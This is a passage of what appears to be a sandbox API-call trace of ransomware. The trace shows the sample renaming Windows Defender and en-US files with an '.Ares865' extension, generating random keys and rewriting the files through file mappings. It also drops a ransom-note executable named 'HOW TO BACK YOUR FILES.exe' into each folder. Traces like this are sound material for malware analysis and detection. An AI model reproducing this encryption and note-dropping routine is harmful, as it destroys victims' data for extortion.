defender\\mpclient.dll"), lpNewFileName="C:\\Program Files (x86)\\Windows Defender\\MpClient.dll.Ares865" (normalized: "c:\\program files (x86)\\windows defender\\mpclient.dll.ares865"), dwFlags=0x1) returned 1 [0123.029] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Defender\\MpClient.dll.Ares865" (normalized: "c:\\program files (x86)\\windows defender\\mpclient.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0123.029] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=392704) returned 1 [0123.029] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0123.029] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0123.029] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0123.029] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0123.030] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0123.030] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.031] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x60100, lpName=0x0) returned 0x170 [0123.032] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x60100) returned 0x420000 [0123.048] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0123.049] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0123.049] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.049] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0123.049] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0123.049] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0123.049] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0123.049] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0123.049] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0123.049] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0123.050] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0123.050] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0123.050] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0123.050] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0123.053] CloseHandle (hObject=0x170) returned 1 [0123.053] CloseHandle (hObject=0x118) returned 1 [0123.053] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0123.053] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0123.053] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0123.055] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde9910bf, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xde9910bf, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x9ac13ba0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xd600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MpOAV.dll", cAlternateFileName="")) returned 1 [0123.055] lstrcmpiW (lpString1="MpOAV.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0123.055] lstrcmpiW (lpString1="MpOAV.dll", lpString2="aoldtz.exe") returned 1 [0123.056] lstrcpyW (in: lpString1=0x2cce450, lpString2="MpOAV.dll" | out: lpString1="MpOAV.dll") returned="MpOAV.dll" [0123.056] lstrlenW (lpString="MpOAV.dll") returned 9 [0123.056] lstrlenW (lpString="Ares865") returned 7 [0123.056] lstrcmpiW (lpString1="OAV.dll", lpString2="Ares865") returned 1 [0123.056] lstrlenW (lpString=".dll") returned 4 [0123.056] lstrcmpiW (lpString1="MpOAV.dll", lpString2=".dll") returned 1 [0123.056] lstrlenW (lpString=".lnk") returned 4 [0123.056] lstrcmpiW (lpString1="MpOAV.dll", lpString2=".lnk") returned 1 [0123.056] lstrlenW (lpString=".ini") returned 4 [0123.056] lstrcmpiW (lpString1="MpOAV.dll", lpString2=".ini") returned 1 [0123.056] lstrlenW (lpString=".sys") returned 4 [0123.056] lstrcmpiW (lpString1="MpOAV.dll", lpString2=".sys") returned 1 [0123.056] lstrlenW (lpString="MpOAV.dll") returned 9 [0123.056] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Defender\\MpOAV.dll.Ares865") returned 57 [0123.056] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Defender\\MpOAV.dll" (normalized: "c:\\program files (x86)\\windows defender\\mpoav.dll"), lpNewFileName="C:\\Program Files (x86)\\Windows Defender\\MpOAV.dll.Ares865" (normalized: "c:\\program files (x86)\\windows defender\\mpoav.dll.ares865"), dwFlags=0x1) returned 1 [0123.058] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Defender\\MpOAV.dll.Ares865" (normalized: "c:\\program files (x86)\\windows defender\\mpoav.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0123.059] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=54784) returned 1 [0123.059] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0123.059] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0123.059] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0123.059] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0123.060] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0123.060] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.060] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd900, lpName=0x0) returned 0x170 [0123.061] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd900) returned 0x190000 [0123.065] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0123.065] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0123.065] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.066] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0123.066] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0123.066] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0123.066] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0123.066] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0123.066] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0123.066] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0123.066] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0123.066] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0123.066] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0123.066] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0123.067] CloseHandle (hObject=0x170) returned 1 [0123.067] CloseHandle (hObject=0x118) returned 1 [0123.067] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0123.067] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0123.067] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0123.067] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbe6c321, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xdbe6c321, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x6c6758d0, ftLastWriteTime.dwHighDateTime=0x1ca041f, nFileSizeHigh=0x0, nFileSizeLow=0x1200, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MsMpLics.dll", cAlternateFileName="")) returned 1 [0123.067] lstrcmpiW (lpString1="MsMpLics.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0123.067] lstrcmpiW (lpString1="MsMpLics.dll", lpString2="aoldtz.exe") returned 1 [0123.068] lstrcpyW (in: lpString1=0x2cce450, lpString2="MsMpLics.dll" | out: lpString1="MsMpLics.dll") returned="MsMpLics.dll" [0123.068] lstrlenW (lpString="MsMpLics.dll") returned 12 [0123.068] lstrlenW (lpString="Ares865") returned 7 [0123.068] lstrcmpiW (lpString1="ics.dll", lpString2="Ares865") returned 1 [0123.068] lstrlenW (lpString=".dll") returned 4 [0123.068] lstrcmpiW (lpString1="MsMpLics.dll", lpString2=".dll") returned 1 [0123.068] lstrlenW (lpString=".lnk") returned 4 [0123.068] lstrcmpiW (lpString1="MsMpLics.dll", lpString2=".lnk") returned 1 [0123.068] lstrlenW (lpString=".ini") returned 4 [0123.068] lstrcmpiW (lpString1="MsMpLics.dll", lpString2=".ini") returned 1 [0123.068] lstrlenW (lpString=".sys") returned 4 [0123.068] lstrcmpiW (lpString1="MsMpLics.dll", lpString2=".sys") returned 1 [0123.068] lstrlenW (lpString="MsMpLics.dll") returned 12 [0123.068] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Defender\\MsMpLics.dll.Ares865") returned 60 [0123.068] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Defender\\MsMpLics.dll" (normalized: "c:\\program files (x86)\\windows defender\\msmplics.dll"), lpNewFileName="C:\\Program Files (x86)\\Windows Defender\\MsMpLics.dll.Ares865" (normalized: "c:\\program files (x86)\\windows defender\\msmplics.dll.ares865"), dwFlags=0x1) returned 1 [0123.070] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Defender\\MsMpLics.dll.Ares865" (normalized: "c:\\program files (x86)\\windows defender\\msmplics.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0123.070] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4608) returned 1 [0123.070] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0123.070] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0123.070] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0123.070] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0123.071] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0123.071] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.071] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1500, lpName=0x0) returned 0x170 [0123.075] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1500) returned 0x190000 [0123.076] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0123.076] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0123.076] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.077] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0123.077] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0123.077] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0123.077] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0123.077] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0123.077] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0123.077] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0123.077] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0123.077] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0123.077] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0123.077] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0123.077] CloseHandle (hObject=0x170) returned 1 [0123.077] CloseHandle (hObject=0x118) returned 1 [0123.077] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0123.077] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0123.077] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0123.078] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbe6c321, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xdbe6c321, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x6c6758d0, ftLastWriteTime.dwHighDateTime=0x1ca041f, nFileSizeHigh=0x0, nFileSizeLow=0x1200, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MsMpLics.dll", cAlternateFileName="")) returned 0 [0123.078] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0123.078] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b10 [0123.078] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Windows Defender\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Windows Defender\\en-US") returned="C:\\Program Files (x86)\\Windows Defender\\en-US" [0123.078] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Windows Defender\\en-US" | out: lpString1="C:\\Program Files (x86)\\Windows Defender\\en-US") returned="C:\\Program Files (x86)\\Windows Defender\\en-US" [0123.078] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0123.078] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Windows Defender\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\windows defender\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0123.079] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0123.079] GetLastError () returned 0x0 [0123.079] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0123.079] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0123.079] CloseHandle (hObject=0x120) returned 1 [0123.080] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0123.080] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Windows Defender\\en-US\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea1accb, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x52272ee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52272ee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0123.080] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0123.080] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0123.080] lstrcpyW (in: lpString1=0x2cce45c, lpString2="MpAsDesc.dll.mui" | out: lpString1="MpAsDesc.dll.mui") returned="MpAsDesc.dll.mui" [0123.080] lstrlenW (lpString="MpAsDesc.dll.mui") returned 16 [0123.080] lstrlenW (lpString="Ares865") returned 7 [0123.080] lstrcmpiW (lpString1="dll.mui", lpString2="Ares865") returned 1 [0123.080] lstrlenW (lpString=".dll") returned 4 [0123.080] lstrcmpiW (lpString1="MpAsDesc.dll.mui", lpString2=".dll") returned 1 [0123.080] lstrlenW (lpString=".lnk") returned 4 [0123.080] lstrcmpiW (lpString1="MpAsDesc.dll.mui", lpString2=".lnk") returned 1 [0123.081] lstrlenW (lpString=".ini") returned 4 [0123.081] lstrcmpiW (lpString1="MpAsDesc.dll.mui", lpString2=".ini") returned 1 [0123.081] lstrlenW (lpString=".sys") returned 4 [0123.081] lstrcmpiW (lpString1="MpAsDesc.dll.mui", lpString2=".sys") returned 1 [0123.081] lstrlenW (lpString="MpAsDesc.dll.mui") returned 16 [0123.081] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Defender\\en-US\\MpAsDesc.dll.mui.Ares865") returned 70 [0123.081] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Defender\\en-US\\MpAsDesc.dll.mui" (normalized: "c:\\program files (x86)\\windows defender\\en-us\\mpasdesc.dll.mui"), lpNewFileName="C:\\Program Files (x86)\\Windows Defender\\en-US\\MpAsDesc.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\windows defender\\en-us\\mpasdesc.dll.mui.ares865"), dwFlags=0x1) returned 1 [0123.082] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Defender\\en-US\\MpAsDesc.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\windows defender\\en-us\\mpasdesc.dll.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0123.082] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=35328) returned 1 [0123.082] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0123.083] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0123.083] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0123.083] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0123.084] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0123.084] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.084] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8d00, lpName=0x0) returned 0x170 [0123.085] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8d00) returned 0x190000 [0123.088] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0123.088] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0123.089] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.089] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0123.090] lstrcpyW (in: lpString1=0x2cce45c, lpString2="MpEvMsg.dll.mui" | out: lpString1="MpEvMsg.dll.mui") returned="MpEvMsg.dll.mui" [0123.090] lstrlenW (lpString="MpEvMsg.dll.mui") returned 15 [0123.090] lstrlenW (lpString="Ares865") returned 7 [0123.090] lstrcmpiW (lpString1="dll.mui", lpString2="Ares865") returned 1 [0123.090] lstrlenW (lpString=".dll") returned 4 [0123.090] lstrcmpiW (lpString1="MpEvMsg.dll.mui", lpString2=".dll") returned 1 [0123.090] lstrlenW (lpString=".lnk") returned 4 [0123.090] lstrcmpiW (lpString1="MpEvMsg.dll.mui", lpString2=".lnk") returned 1 [0123.090] lstrlenW (lpString=".ini") returned 4 [0123.090] lstrcmpiW (lpString1="MpEvMsg.dll.mui", lpString2=".ini") returned 1 [0123.090] lstrlenW (lpString=".sys") returned 4 [0123.090] lstrcmpiW (lpString1="MpEvMsg.dll.mui", lpString2=".sys") returned 1 [0123.090] lstrlenW (lpString="MpEvMsg.dll.mui") returned 15 [0123.090] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Defender\\en-US\\MpEvMsg.dll.mui.Ares865") returned 69 [0123.090] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Defender\\en-US\\MpEvMsg.dll.mui" (normalized: "c:\\program files (x86)\\windows defender\\en-us\\mpevmsg.dll.mui"), lpNewFileName="C:\\Program Files (x86)\\Windows Defender\\en-US\\MpEvMsg.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\windows defender\\en-us\\mpevmsg.dll.mui.ares865"), dwFlags=0x1) returned 1 [0123.097] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Defender\\en-US\\MpEvMsg.dll.mui.Ares865" (normalized: "c:\\program files (x86)\\windows defender\\en-us\\mpevmsg.dll.mui.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0123.097] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=15360) returned 1 [0123.097] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0123.097] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0123.097] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0123.097] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0123.098] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0123.098] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.098] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3f00, lpName=0x0) returned 0x170 [0123.100] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3f00) returned 0x190000 [0123.102] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0123.102] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0123.102] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0123.103] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0123.103] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Uninstall Information", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Uninstall Information") returned="C:\\Program Files (x86)\\Uninstall Information" [0123.104] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Uninstall Information" | out: lpString1="C:\\Program Files (x86)\\Uninstall Information") returned="C:\\Program Files (x86)\\Uninstall Information" [0123.104] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0123.104] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Uninstall Information\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\uninstall information\\how to back your files.exe"), bFailIfExists=1) returned 0 [0123.105] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0123.105] GetLastError () returned 0x0 [0123.105] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 